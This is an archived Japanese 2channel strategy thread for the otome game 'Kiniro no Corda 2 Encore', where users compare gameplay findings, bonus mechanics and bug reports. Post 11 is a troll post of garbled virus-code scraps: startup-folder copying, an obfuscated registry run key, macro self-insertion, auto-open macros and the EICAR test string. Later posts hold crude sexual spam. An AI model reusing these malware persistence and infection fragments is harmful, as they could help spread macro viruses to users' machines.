5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

乙女@金色のコルダ2 アンコール 攻略・ネタバレ6

1 :名無しって呼んでいいか?:2007/10/09(火) 11:57:25 ID:???
9月20日発売、「金色のコルダ2 アンコール」の攻略・ネタバレスレです。
攻略・ネタバレ以外の話題、「金色のコルダ(無印・2)」の攻略質問などは本スレでどうぞ。
なお質問の際にはwikiや過去ログを読んで同様の質問が出ていないかを確認して下さい。

過度なキャラ話はご遠慮下さい。必要に応じて各キャラスレに移動して下さい。
(スレの無いキャラはスレ立てを。各スレの1ヶ月間バレ禁止等のルール変更は各スレにて相談)
同様に、過度なキャラ叩きもご遠慮下さい。アンチスレなどでどうぞ。また叩き&煽りに対してはスルーで。
発売一ヶ月以降は次スレを立てず、本スレか攻略総合スレに移動すること。
sage進行で、次スレが必要な場合は>>950が立てて下さい。

金色のコルダ2アンコール攻略@wiki
ttp://www39.atwiki.jp/corda2-encore/

前スレ
乙女@金色のコルダ2 アンコール 攻略・ネタバレ5
http://game12.2ch.net/test/read.cgi/ggirl/1191213537/
本スレ
乙女@【金色の】金色のコルダ70【(゚Д゚)ゴルァ!!】
http://game12.2ch.net/test/read.cgi/ggirl/1191603255/

金色のコルダ2 アンコール 公式サイト
ttp://www.gamecity.ne.jp/ps2/corda2/encore

2 :名無しって呼んでいいか?:2007/10/09(火) 13:00:51 ID:???
まんこ

3 :名無しって呼んでいいか?:2007/10/09(火) 14:08:19 ID:???
>>1
乙!!!!

4 :名無しって呼んでいいか?:2007/10/09(火) 15:41:49 ID:???
今のうちに>>1乙と言っておこうっと


5 :名無しって呼んでいいか?:2007/10/09(火) 16:12:04 ID:???
前スレでは1000間際だったからこっちにも貼っておくね。

988 名前:901[sage] 投稿日:2007/10/09(火) 15:57:43 ID:???
「鳴き声CD」の件で問合せをした者です。先ほど肥から返信が来ました。

【返信内容の要約】
肥側でも、柚木・加地の休日デートでCDを貰っても課題達成しない事を確認した。
申し訳ないが、天羽情報→モブからCDを貰う方法でプレイしてくれ

以上。モブからCD貰っても課題達成できないなら対処するのだろうが、
とりあえずひとつは手段が残っているから妥当な回答かと。
攻略本が重版されたら該当部分の文章が訂正されるくらいだろうね。
つーことで、プレイの際にはモブからCDを貰ってください。

6 :名無しって呼んでいいか?:2007/10/09(火) 16:26:23 ID:???
>>1乙ィガーヌ(ちょっとやってみたかった。反省はしていないww)
そして前スレ終了おめ。肥に問い合わせ姐さんも乙。

7 :名無しって呼んでいいか?:2007/10/09(火) 16:26:49 ID:???
>>1

ところで、陰気系モブは好きな色を教えてくれたり、
博識モブは言うまでもなく情報教えてくれたりするけど、
呑気系とかは何かないんだろうか?
そりゃ、お年玉がなくなるまで走り続けますよ!とか言われれば和むけどさw
それ以外のメリットはないんだろうか

8 :名無しって呼んでいいか?:2007/10/09(火) 16:28:41 ID:???
>>1

前スレ999
おしかったな。1000だったらよかったのにw

9 :名無しって呼んでいいか?:2007/10/09(火) 16:31:21 ID:???
前スレ999、ごめんな、999に間に合うつもりだったんだよ
1000取っちゃってごめん、もっと素早く書き込むべきだった

10 :前スレ999:2007/10/09(火) 16:34:30 ID:???
>>1
乙です!

>>8
999って書けば良かったよw

CDバグは一段落ついたね。
次は用語辞典の最後の1つを埋めたいところだ。

11 :名無しって呼んでいいか?:2007/10/09(火) 17:49:16 ID:???
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


12 :名無しって呼んでいいか?:2007/10/09(火) 18:02:26 ID:???
そーいやラチェットは渡さんからもきけたんだよね
っていうか、ひょっとしたら情報系モブなら誰でもいいんじゃないかと思うんだよね

13 :名無しって呼んでいいか?:2007/10/09(火) 19:02:55 ID:???
情報系モブ+内田くん、かな
内田くんはセリフの割り振りからすると一般の博識モブから外れてるんだけど
(香穂子相手に丁寧語使わないしね)、
ラチェットに関しては情報保持者のままなんだね

14 :名無しって呼んでいいか?:2007/10/09(火) 22:19:24 ID:???
>>1乙ですー

用語辞典の「ディーヴァ」なんだけど
wikiに書かれている選択肢を選んでも必ず出てくるとは限らないみたいだ
他の2曲を選んだ場合は何度リロっても出てこないのでこちらはいいとして
「終わりなき想い」を選択しても、他を選んだときと同じ台詞で終わることもある
ので、ランダムで発生と追記しても良いだろうか

15 :名無しって呼んでいいか?:2007/10/09(火) 22:28:58 ID:???
>>14
前スレ>>931だが、自分携帯なんでwiki編集できなかったんだorz

やはりランダムか…。

16 :名無しって呼んでいいか?:2007/10/09(火) 22:41:01 ID:???
>>15
うん、やっぱりランダムのようだよ
カラオケ1回目とも限らないようだね
ちょっとwikiに追記してくるよノシ

17 :名無しって呼んでいいか?:2007/10/10(水) 00:20:58 ID:???
2のときにも言われていた気がするんだが…
タイトルコールによく出てくるキャラってあるのかね?
うちは月森と土浦がほとんどで都築や加地が全然出てこんのだが

18 :名無しって呼んでいいか?:2007/10/10(水) 02:20:02 ID:???
うちは白柚木がレアキャラ。もうかなり周回こなしてるのに一回しか聴いてない。
あと王崎先輩志水火原が出てこない。

19 :名無しって呼んでいいか?:2007/10/10(水) 02:32:53 ID:???
ランダム

20 :名無しって呼んでいいか?:2007/10/10(水) 04:43:08 ID:???
多分ランダムだと思うけど、
その時メインで攻略してるキャラが聞きやすい…ような気がしないでもない

21 :名無しって呼んでいいか?:2007/10/10(水) 08:00:58 ID:???
なんとなく思ってたんだけど、2からの引継楽譜って、
モブはどうだか知らないけど、メイン達は習熟度の上がりが良く感じる。

やさしいで初日に土浦、柚木、冬海ちゃんを加えて牧神やってたんだけど、
白鳥より技術Lv高いから普通なら習熟度は白鳥より上がりにくい筈なのに、
初日に自宅で確認したら、柚木は50近く、冬海ちゃんと土浦も40近くまで上がっててビビったんだ。
柚木は確かに得意曲だけど、土浦なんて清麗苦手な筈なのに
得意な筈の、愁情の白鳥より上がりが良いんだ。
同じメンバーで白鳥やったときは初日に20そこそこだった。
同じように思った姐さんはいないかな?

22 :名無しって呼んでいいか?:2007/10/10(水) 09:09:02 ID:???
統計取ってないからなあ<タイトルコール
あと、内部的に乱数が発生してるとして、
起動してからキーを打つタイミングがいつも同じだと同じ変数に当たりやすいとかあるかもしれないし

23 :名無しって呼んでいいか?:2007/10/10(水) 09:32:05 ID:???
タイトルコール、月森土浦聞いたことがない…

一番多いのは王崎、次が都築

24 :名無しって呼んでいいか?:2007/10/10(水) 10:02:48 ID:???
タイトルコールの話。今さらなんだけど、今回はリリも言ってない?
聞いた覚えがあるんだけど、2では無かった筈なので
気のせいかと思って流していたり……。他にも聞いた人居る?

25 :名無しって呼んでいいか?:2007/10/10(水) 10:13:44 ID:???
リリのタイトルコールあったよ

26 :名無しって呼んでいいか?:2007/10/10(水) 10:16:22 ID:???
2でもアンコでも聞いたよ>リリのタイトルコール

27 :名無しって呼んでいいか?:2007/10/10(水) 10:20:04 ID:???
普通にリリも言ってました

アンコールでは、都築さんのもあるのが意外だった
2で理事長のもあったからおなじようなことなんだけどさ

28 :名無しって呼んでいいか?:2007/10/10(水) 10:21:07 ID:???
モブキャラ全員のコールとかあってもよかったのになw

29 :名無しって呼んでいいか?:2007/10/10(水) 12:45:00 ID:???
ところでさ、作曲家出身国ボーナスはフランス・イタリア・ロシアしかつかないんだよね?
これwikiに書いていい?
多分アンコだけじゃなくて2もそうだと思うんだけど
(そういえば前にオーストリアでつかなかったの思い出した、
あの時は自分が何か勘違いしてたかと思っていたが)

30 :名無しって呼んでいいか?:2007/10/10(水) 12:50:03 ID:???
そういえば、モーツァルトやチャイコフスキーはボーナスになりそうな感じだが
(確かモブのセリフでも、モーツァルトだけで揃えてみるとか…というのがあったような)、
でもアンコールだと引継楽譜ないと3曲埋まらないよな?

31 :名無しって呼んでいいか?:2007/10/10(水) 13:36:11 ID:CrOyTYN2
オーストリアではつかないね。
モブのセリフでモーツアルトだけでどうのって、クラリネットの筧君が2では
話してたと思う。

32 :名無しって呼んでいいか?:2007/10/10(水) 13:36:33 ID:???
ごめん、上げちゃったorz
下げます

33 :名無しって呼んでいいか?:2007/10/10(水) 13:38:14 ID:???
>>30
引継楽譜前提のボーナスなのかも

34 :名無しって呼んでいいか?:2007/10/10(水) 15:48:10 ID:???
>>31
アンコでも誰かが言ってた…けど誰だったかなあ
モーツァルトで加入する人が誰かいたよな、その手の人かな

35 :名無しって呼んでいいか?:2007/10/10(水) 16:12:09 ID:???
>>13
亀だけど、内田は従来通り博識性格で問題ないと思うよ
今回、一部の重要モブは所属と性格による本来のセリフとは違う
そのキャラ独自のセリフをしゃべるから
上条の彼氏である内田は重要モブに分類されて
専用のセリフが割り振られてるだけな気がする

以下余談
道場百合は引き継ぎの楽譜くれるキャラだが
もらった後でもう一度話しかけてみたら
「中学の頃のあだ名はもちろん鉄人でした」とか言った
楽譜くれるだけのモブにも専用セリフがあるとはw

36 :名無しって呼んでいいか?:2007/10/10(水) 16:23:31 ID:???
>>35
いや、それは既に博識モブとは言えないだろう
>>35自身が言っているように、内田くんは重要モブというカテゴリ内だと思う
重要というとちょっとおかしいかな…特殊モブとでもいうかな?
タイプによるセリフ割り振りではなくキャラ個別のセリフが設定されているモブ
柚木親衛隊もある意味それにあたるよね、海野さんとか白石や西くんwや、
モーリーズあたりもそれに該当する

○○モブ、と性格で区別されるモブは、基本的にセリフは共有していると思う
道場さんのライン引きが難しいところだがw

37 :名無しって呼んでいいか?:2007/10/10(水) 16:25:52 ID:???
そういえば確か滝沢さんが、「柚木美崎…素敵な名前よね」とか言ってたのを思い出したw
柚木ファンたちって、実はセリフ共有はせずにそれぞれ独自のセリフを話してる気がする
北島さんあたりには嫌味を言われるし、新見さんは相変わらず手厳しいし

38 :名無しって呼んでいいか?:2007/10/10(水) 17:05:44 ID:???
博識モブの特徴
・学校の各場所の情報に詳しい
・同学年・上級生なのに常に敬語で話す
・言動から察するに性格は真面目な努力家?
こんな感じだろうか

39 :名無しって呼んでいいか?:2007/10/10(水) 17:42:37 ID:???
カレーパンの歌うたったりカニピラフの話したりとかは何人かいるよね
目覚まし時計10個のモブも複数名いるのが不思議だw

40 :名無しって呼んでいいか?:2007/10/10(水) 17:47:39 ID:???
そういえばさ、よくある質問にはラチェットの情報提供者4人しか書いてないけど、
自分は渡さんから話をきいた
何となく博識モブはみんな知ってるんじゃないかと思うんだけど…

情報くれるモブリストの中の、日下部さんにしかラチェットのこと書いてないので、
よくある質問に載ってる安西さんと、渡さんについては書き足してみた
あの表が全部埋まるなら、ラチェットは博識モブで確定していいと思う

41 :名無しって呼んでいいか?:2007/10/10(水) 17:52:28 ID:???
関係ないけど西崎くんは二人いるんだな
音楽科と普通科に一人ずつ
他にかぶりはないんだろうか?

42 :名無しって呼んでいいか?:2007/10/10(水) 18:08:44 ID:???
ところで、上の国別の選曲ボーナスについての話とか、
多分冬テーマはアンコではボーナスじゃないであろうことは書いてもいいかな?

前にも言われてたような気がするけど、音楽科生徒の加入条件で、
○○の曲を聴かせる、とかになってるのが、
テーマボーナスの条件に直結してるんじゃないかと思うけど
イタリア、フランス、ロシア、モーツァルト、チャイコフスキー、
国民楽派、弦楽四重奏、歌劇、バロック、各曲調や各出演者、あたりはあるよね

43 :名無しって呼んでいいか?:2007/10/10(水) 19:24:59 ID:???
月森が日野のパンツをズリ下げる

やめて・・月森・・・君・・・・
君が欲しい・・・

44 :名無しって呼んでいいか?:2007/10/10(水) 19:26:15 ID:???
>>41
2での話だったかもしれないけど永田さんも2人いた
片方は永田諒子って名前で科は忘れた(確か音楽科?)
もう片方は名前は忘れたけど普通科の女子

45 :名無しって呼んでいいか?:2007/10/10(水) 19:26:55 ID:???
糞詰まり金澤

46 :名無しって呼んでいいか?:2007/10/10(水) 19:29:52 ID:???
便座とタッグを組む

47 :名無しって呼んでいいか?:2007/10/10(水) 19:34:05 ID:???
今日のディナー
食材は日野香穂子

私を食べて

48 :名無しって呼んでいいか?:2007/10/10(水) 19:34:06 ID:???
内田くんはアンコになって専用セリフが与えられて
特殊モブに分類されるようになったけど
もし特殊モブでも(セリフには表れないとしても)性格は一応決まってるとしたら
無印や2の例からして博識だよね?
だから博識モブ全員がラチェット情報くれるとしたら
そこに内田くんが入ってるのは別に例外ってわけじゃないと思う

49 :名無しって呼んでいいか?:2007/10/10(水) 19:39:16 ID:???
金澤との最中に加地が隠し撮りハアハア
枕は便座

50 :名無しって呼んでいいか?:2007/10/10(水) 19:40:51 ID:???
あんあんハアハア
ああああああああああああああ

51 :名無しって呼んでいいか?:2007/10/10(水) 19:41:41 ID:???
ヤメロ、攻略スレです。

52 :名無しって呼んでいいか?:2007/10/10(水) 19:43:53 ID:???
ここに入れて
ここ・・ここぉおおおおおお!!!
ああああああああああん
あ・・・んん
ああああああんんんんんんん

53 :名無しって呼んでいいか?:2007/10/10(水) 19:45:17 ID:???
志水のデカチンに喘ぐ

54 :名無しって呼んでいいか?:2007/10/10(水) 19:46:51 ID:???
金やんのがでかいと思うが

55 :名無しって呼んでいいか?:2007/10/10(水) 19:50:19 ID:???
淫乱のコルダ〜みんなで乱交〜

56 :名無しって呼んでいいか?:2007/10/10(水) 19:51:49 ID:???
やおいへどうぞ

57 :名無しって呼んでいいか?:2007/10/10(水) 19:54:31 ID:???
金色のデカマラ

58 :名無しって呼んでいいか?:2007/10/10(水) 19:55:48 ID:???
またいつもの人か。

59 :名無しって呼んでいいか?:2007/10/10(水) 19:57:34 ID:???
いや、それにしては出没時間早すぎる
しかもレス時間遅いし
何人かの内の便乗だろ

60 :名無しって呼んでいいか?:2007/10/10(水) 19:58:06 ID:???
スルースルー

61 :名無しって呼んでいいか?:2007/10/10(水) 20:00:06 ID:???
ここでやるなよ
絡み池

62 :名無しって呼んでいいか?:2007/10/10(水) 20:00:36 ID:???
いっそ清清しくコテでもつけたら?
こんな事書き込んで何が楽しいんだか。

63 :名無しって呼んでいいか?:2007/10/10(水) 20:00:54 ID:???
桃尻土浦

64 :名無しって呼んでいいか?:2007/10/10(水) 20:01:57 ID:???
コテつけられても、一層ウザイケドなw

65 :名無しって呼んでいいか?:2007/10/10(水) 20:02:38 ID:???
>>64
確かにww

66 :名無しって呼んでいいか?:2007/10/10(水) 20:03:50 ID:???
俺のチン草原

67 :名無しって呼んでいいか?:2007/10/10(水) 20:04:29 ID:???
どうでもいいがお前らもウザイから

68 :名無しって呼んでいいか?:2007/10/10(水) 20:05:36 ID:???
巨木柚木

69 :名無しって呼んでいいか?:2007/10/10(水) 20:06:37 ID:???
( ´▽`)今日も平和だな〜

70 :名無しって呼んでいいか?:2007/10/10(水) 20:07:17 ID:???
日野は丘2つ

71 :名無しって呼んでいいか?:2007/10/10(水) 20:10:05 ID:???
今宵も仲良くアンアンアン

72 :名無しって呼んでいいか?:2007/10/10(水) 20:10:37 ID:???
夜中の人のように勢いが無いのも笑える

73 :名無しって呼んでいいか?:2007/10/10(水) 20:14:36 ID:???
今から加地とベットイン

74 :名無しって呼んでいいか?:2007/10/10(水) 20:16:08 ID:???
30秒間隔で書いてくださいねw

75 :名無しって呼んでいいか?:2007/10/10(水) 20:18:54 ID:???
いいかげん相手するなよカス
煽ってる時点で同類なんだよ
クズ

76 :名無しって呼んでいいか?:2007/10/10(水) 20:20:37 ID:???
好きキャラ叩かれるよりはマシだけど
801でやってほしい

77 :名無しって呼んでいいか?:2007/10/10(水) 20:21:30 ID:???
>>ALL
絡みへどうぞ

78 :名無しって呼んでいいか?:2007/10/10(水) 20:24:32 ID:???
日野、マメ2つ

79 :名無しって呼んでいいか?:2007/10/10(水) 20:44:12 ID:???
やっと全員攻略した
が、何だこの萎しか残らない内容の薄さは・・・・
ここで絶賛されてたのが理解できない
2のがまだ面白みがあった気がするんだが

80 :名無しって呼んでいいか?:2007/10/10(水) 20:44:59 ID:???
アンチスレに池ば??

81 :名無しって呼んでいいか?:2007/10/10(水) 20:45:46 ID:???
>>79
つ コルダ1・2アンチスレ

82 :名無しって呼んでいいか?:2007/10/10(水) 20:46:17 ID:???
別にアンチでもなく、思ったことを言っただけだが


83 :名無しって呼んでいいか?:2007/10/10(水) 20:47:36 ID:???
好き嫌いは別としても、
確かに内容は薄味かもね

84 :名無しって呼んでいいか?:2007/10/10(水) 20:48:04 ID:???
絶賛されてた当時は知らないけど、基本的に攻略スレだから
そういう感想を振っても、レスが来にくいと思うんだが

85 :名無しって呼んでいいか?:2007/10/10(水) 20:48:06 ID:???
さっきからアンチうざい、アンチスレに池

86 :名無しって呼んでいいか?:2007/10/10(水) 20:49:40 ID:???
でもまぁ、今となっちゃ攻略のネタも尽きてるわけだけど

87 :名無しって呼んでいいか?:2007/10/10(水) 20:50:20 ID:???
まぁね

88 :名無しって呼んでいいか?:2007/10/10(水) 20:50:46 ID:???
大まかな主要ネタは出た感じだからね
あとはモブとかその他ちょっとしたネタしかないのは事実かも

89 :名無しって呼んでいいか?:2007/10/10(水) 20:52:03 ID:???
何も無いから変な奴の住家となってるのか

90 :名無しって呼んでいいか?:2007/10/10(水) 20:54:06 ID:???
月森のビンタネタを楽しみにしていた自分が懐かしい

91 :名無しって呼んでいいか?:2007/10/10(水) 20:55:08 ID:???
変な奴は単にかまわれたがってるだけだろ

92 :名無しって呼んでいいか?:2007/10/10(水) 20:55:10 ID:???
>>90
あれは、自分も本当に有るのかとwktkしたもんさw
結局「ネタ」止まりだったのが残念だけどもw

93 :名無しって呼んでいいか?:2007/10/10(水) 20:56:44 ID:???
ビンタ・・・懐かしいな。
でも、今考えても月森にビンタなんて
あるわきゃないけどなww
何したらビンタされんだw乙女ゲなのにw

94 :名無しって呼んでいいか?:2007/10/10(水) 20:57:52 ID:???
続編に期待

95 :名無しって呼んでいいか?:2007/10/10(水) 20:59:23 ID:???
続編出てもあると思わんが、
続編出るかも分からんわけで

96 :名無しって呼んでいいか?:2007/10/10(水) 20:59:56 ID:???
ないだろ〜
3とかっしょ?

97 :名無しって呼んでいいか?:2007/10/10(水) 21:00:23 ID:???
餡子で端折られた音楽祭編とか
嫌すぎる

98 :名無しって呼んでいいか?:2007/10/10(水) 21:00:58 ID:???
前も誰かが言っていたが
〜カーテンコール〜とかw
3が出れば一番嬉しいけど。

99 :名無しって呼んでいいか?:2007/10/10(水) 21:01:45 ID:???
次もし出たとしても3年組みはいるのかどうか

100 :名無しって呼んでいいか?:2007/10/10(水) 21:02:32 ID:???
いないだろ
だから今回2人があんな感じだと

101 :名無しって呼んでいいか?:2007/10/10(水) 21:03:50 ID:???
新1年とか来ても嫌だ
先輩梨の後輩ばっかりもな〜・・・

102 :名無しって呼んでいいか?:2007/10/10(水) 21:05:31 ID:???
王崎みたいに頻繁に出るやもしれんw
いらねw

103 :名無しって呼んでいいか?:2007/10/10(水) 21:06:23 ID:???
まぁまぁ、出るかも分かんないんだからさw

104 :名無しって呼んでいいか?:2007/10/10(水) 21:11:44 ID:???
もう名前にする天体ないんじゃないの?w

105 :名無しって呼んでいいか?:2007/10/10(水) 21:13:48 ID:???
想い出コーナーに『ムービー』があるのを見て、
“アニメキタ―――――――!!!!!”とワクワクしたあの頃が懐かしい…。

でも少し前に肥サイトでやってたアンケートに
「やっぱりEDはクラシック曲の方が良かった」と回答したのは自分です。
正直スマンかった。

106 :名無しって呼んでいいか?:2007/10/10(水) 21:14:05 ID:???
3年卒業まだだし、続きあるんじゃね?


107 :名無しって呼んでいいか?:2007/10/10(水) 21:16:10 ID:???
細かいのは、また別にファンディスクみたいな感じで出るかと

108 :名無しって呼んでいいか?:2007/10/10(水) 21:20:36 ID:???
月森スキーは少し可哀相と思ったけど、
あとは完結でもおかしくないし。
もう何も無いんじゃない?

109 :名無しって呼んでいいか?:2007/10/10(水) 21:23:02 ID:???
月森は、あーゆーキャラ設定なんだろ
仕方ナス

110 :名無しって呼んでいいか?:2007/10/10(水) 21:30:43 ID:???
メーカー違うけど、ときメモ方式でコルダをやってみたかった…年間サイクルで

3には期待しないけど、1=春のコンクール〜2+餡子(+音楽祭)の一年間でリメイクしてくれたら…
無茶だとはわかっているが

111 :名無しって呼んでいいか?:2007/10/10(水) 21:36:20 ID:???
>>110
育成期間が長いとたるい人もいると思うけど、
思う存分育成できそうでいいよねwww
一期にあげたパラメーターでその後の展開が変わるとか(ポケモンかよ)

112 :名無しって呼んでいいか?:2007/10/10(水) 21:43:43 ID:???
柚木は絶対押し倒しあると思ったのにぃ

つまんなーい!

113 :名無しって呼んでいいか?:2007/10/10(水) 21:49:06 ID:???
コルダの話が作り辛いから無理だろうけど、月森の逆注目の
音楽的にはダメダメヒロインが餡子まで続いていたら
某ダイエットヒロインの様に画期的出来事だったかもなと思う。
でき過ぎというか無敵ヒロインはどうもなー。
育成結果で恋愛も変わる所が良かったのに2から一本道だもんな。

114 :名無しって呼んでいいか?:2007/10/10(水) 21:51:01 ID:???
遅レスですまんが

>>42
>イタリア、フランス、ロシア、モーツァルト、チャイコフスキー、
>国民楽派、弦楽四重奏、歌劇、バロック、各曲調や各出演者、あたりはあるよね

上記に加えてドヴォルザークで餡子のキーワードすべてだよ
餡子曲のみで達成可能なのは、歌劇・ロシア・フランスのみだね

115 :名無しって呼んでいいか?:2007/10/10(水) 22:38:16 ID:???
>>48
いや、単に情報を割り振ったときに、
内田くんが元は博識モブだったからラチェット担当になったのでは
ていうかモーリーは博識か?
主要モブにはサックス奏者教えてくれる人もいるし、
そういう振り分けの一種かと

しかし内田くんが博識モブとして分類されるかは論じても意味ないか
博識モブ全員がラチェット情報くれるかどうかが本題だっけ
調べられるかなあ…

116 :名無しって呼んでいいか?:2007/10/10(水) 22:41:28 ID:???
>>114
おや、ドヴォルザークもボーナス?
念のために、音楽科生徒でドヴォルザーク聴かせる条件の人いるかな?
いなかったら上の説は崩れるな

117 :名無しって呼んでいいか?:2007/10/10(水) 22:46:09 ID:???
>>116
コンプリ本の演奏者リストによれば、ドヴォルザークを聴かせる条件のモブは存在しない
でも演奏曲リストにはドヴォルザークのキーワードが書かれている
自分もまだ狙ったことがないので、実際に演奏してみないと確定しないけどね

118 :名無しって呼んでいいか?:2007/10/10(水) 22:52:52 ID:???
>>117
そうか、教えてくれてありがとう

しかしボーナスつくかつかないかの判別が、
攻略本情報でしかできないのは悔しいな
いろいろやってみろってことだろうけどさ

119 :名無しって呼んでいいか?:2007/10/10(水) 22:55:08 ID:???
攻略本は手元にあるが、実際プレイしてみないと合ってるか怪しいのが困る

120 :名無しって呼んでいいか?:2007/10/10(水) 22:55:14 ID:???
>>115
だいぶ前の記憶だから、ちょっと自信がないんだけど
内田くんも場所情報を教えてくれた気がするんだよね
毎日ほぼ全員に最低2回は話しかけてた初回プレイの
時の事だからおぼろなんだけど…
ただ、自分以外にそれを聞いた人がいないみたいだしなー

121 :名無しって呼んでいいか?:2007/10/10(水) 23:02:53 ID:???
モーツァルトはモブがコンサートのコツみたいのを教えてくれるときにも出るのはガイシュツだよね。
とりあえず二階堂くんが今教えてくれたんだけども、
二階堂くん系モブ…って何系なんだろうねw

122 :名無しって呼んでいいか?:2007/10/10(水) 23:05:18 ID:???
>>120
2ではなくアンコでか
自分は敬語使わなくなった内田くんにしか会ってない
ラチェットの時は敬語?
会話出し尽くしたら出るとか?

そのうち谷くんが個別台詞以外にも、
陰気系定番台詞なども言うようになるんだろうか
今のところ白文字が毎回ざくざく出てきて楽しいが

123 :名無しって呼んでいいか?:2007/10/10(水) 23:07:00 ID:???
>>121
自分もそれで出したなあ
二階堂くんは何だっけ…

というか性格分類ていくつあるんだろう

124 :名無しって呼んでいいか?:2007/10/10(水) 23:15:32 ID:???
攻略本見て気付いたけど、
ドヴォルザーク曲(アメリカ・チェロ協奏曲・スラヴ舞曲)は
同時に「国民学派」というキーワードを持っている。
確かテーマボーナスってひとつしか付かないと思ったから、
演奏しても「国民学派」になると思うのだが。

125 :名無しって呼んでいいか?:2007/10/10(水) 23:17:31 ID:???
>>124
あ、なるほど
今度演奏してみよう

126 :117:2007/10/10(水) 23:20:01 ID:???
今検証中…しばらくおまちください

127 :名無しって呼んでいいか?:2007/10/10(水) 23:31:02 ID:???
谷くんはむしろ陽気になりつつあるからなーw
よっ、学院を救ったヒロイン!とか言われたしwww

128 :117:2007/10/10(水) 23:33:59 ID:???
検証しました

アメリカ、チェロ協奏曲、スラヴ舞曲を演奏したら
「ドヴォルザークの民族色を満喫できて良かった!」と出ました
逆に「国民学派」のボーナスはどうやったら出るんだろう?

129 :名無しって呼んでいいか?:2007/10/10(水) 23:35:56 ID:???
谷くんは加地√の台詞とか聞いてると陽気以外の何者でもないような気もw

130 :名無しって呼んでいいか?:2007/10/10(水) 23:40:08 ID:???
>>128


他の作曲家加えたらいいのでは

131 :名無しって呼んでいいか?:2007/10/10(水) 23:41:59 ID:???
>>128
ドヴォルザークのボーナスは、その3曲しか書いてないから、
国民学派と被っててもドヴォルザーク優先だろうな

国民学派は、モルダウ・展覧会・中央アジア〜が入ってるから、
ドヴォルザークの曲を1つか2つにして、モルダウ以下の曲を入れたら
ボーナスになるのかも

132 :名無しって呼んでいいか?:2007/10/10(水) 23:42:42 ID:???
>>128
検証乙です。ドヴォルザークは出てくるんだ。
国民学派曲は他にもあるから、
ドヴォルザーク曲(アメリカ・チェロ協奏曲・スラヴ舞曲)で揃えなければ出るのだろうけど、
この3曲では出ないのかねぇ。

133 :名無しって呼んでいいか?:2007/10/10(水) 23:45:32 ID:???
>>130
いや、>>124も書いてくれてるんだけど
この3曲は「国民学派」のキーワードも兼ねてるんだ
だからこの3曲で「国民学派」のキーワードは出せないんだろうかと思って

>>131
なるほど、優先順位でドヴォルザークしか出ないのかもしれないね
ありがとう

余談だけど、難度19以上の曲演奏が条件に入ってたセーブデータを使ったので
課題未達成になって初めてそのEDを見た
あっけないんだなw

134 :名無しって呼んでいいか?:2007/10/10(水) 23:52:52 ID:???
>>133
検証してその結果なんだから、
その3曲で他に方法がないかと言われても、
優先順位以外の結論はないというか

チャイコボーナス時にロシアはつかないのと同じ

135 :名無しって呼んでいいか?:2007/10/10(水) 23:54:20 ID:???
これは2の話になってしまうけど、
四季の冬を入れてて、弦楽四重奏やったら、
どっちのボーナスかな

136 :名無しって呼んでいいか?:2007/10/10(水) 23:57:10 ID:???
ボーナス自体が複数の組み合わせ可能かとか、
あんまり考えたことなかったな
曲調ボーナスとの兼ね合いはよく意識するけど

とりあえず作曲家はそろえられれば間違いなくボーナスつくって感じかな?

137 :名無しって呼んでいいか?:2007/10/11(木) 00:02:14 ID:???
>>135
2の場合、
「冬」は4コンでは重複ボーナス可能だから
「冬」と「弦楽四重奏」の両方が付く。
餡子は重複ボーナスは無さそうだな。

138 :名無しって呼んでいいか?:2007/10/11(木) 00:05:43 ID:???
>>137
ほう、ありがとう

重複可能なら、2ならロシアとチャイコの両どりもありかなあ、
アンコで不便になったのかなその辺。

139 :137:2007/10/11(木) 00:17:33 ID:???
>>138
ゴメン、紛らわしい書き方だった。
あくまでも重複ボーナス可能なのは「冬」+「他のテーマ」のみ。
これはマエストロに書いてあった。
まぁこれ以上はスレチになるので止めておく。

140 :117:2007/10/11(木) 00:44:12 ID:???
ついでに、「チャイコフスキー」と「ロシア」が被ってる
ピアノ協奏曲第1番、偉大なる〜、白鳥の湖を演奏してみた

キーワードは「チャイコフスキー」の方が出たよ
チャイコフスキーはこの組み合わせしかないから
これも作曲家の方が優先されたのかもしれない
ひとまず報告まで

141 :名無しって呼んでいいか?:2007/10/11(木) 01:55:09 ID:???
加地に手すら繋ぐスチルないのは不平等
月森もだ。
3年B組許すまじ

142 :名無しって呼んでいいか?:2007/10/11(木) 02:11:39 ID:???
>>141
加地は需要ないしwwwwwww
柚木最萌でよかったー!!
昔作った脳内小説がそのまんまアンコール柚木だからw

Kissは無理矢理感あればなおよしwwwww

143 :名無しって呼んでいいか?:2007/10/11(木) 02:15:12 ID:???
>>141
私も柚木好きvv
だからキスできてしあわせ。
しかも本名プレーで恥ずかしかった//後ろに連れがいたしw
エンディング見るかぎり一線越えてる気がするの私だけ?

144 :名無しって呼んでいいか?:2007/10/11(木) 02:16:06 ID:???
森さんに話しかけたら、「あなたの伴奏者は、私の役目…でしょ?」と言われた。

グッジョブ森さん!!

145 :名無しって呼んでいいか?:2007/10/11(木) 02:17:19 ID:???
>>142
加地君は柚木の家絡馬鹿にしてたのありえないよね。
お前もボンボンだろーかと思わずテレビの前で叫んだし。
ビオラも微妙な楽器だしあるいみ空気?
ププ

146 :名無しって呼んでいいか?:2007/10/11(木) 02:17:37 ID:???
ボーナスの話題の流れのようなので疑問提起

演奏者ボーナスで複数の演奏者が重なった場合
恋愛段階の高い方、それも同じなら親密度の高い方が選ばれるが
さらに親密度も同じだったら、選ばれる人はどうやって決まるんだろう
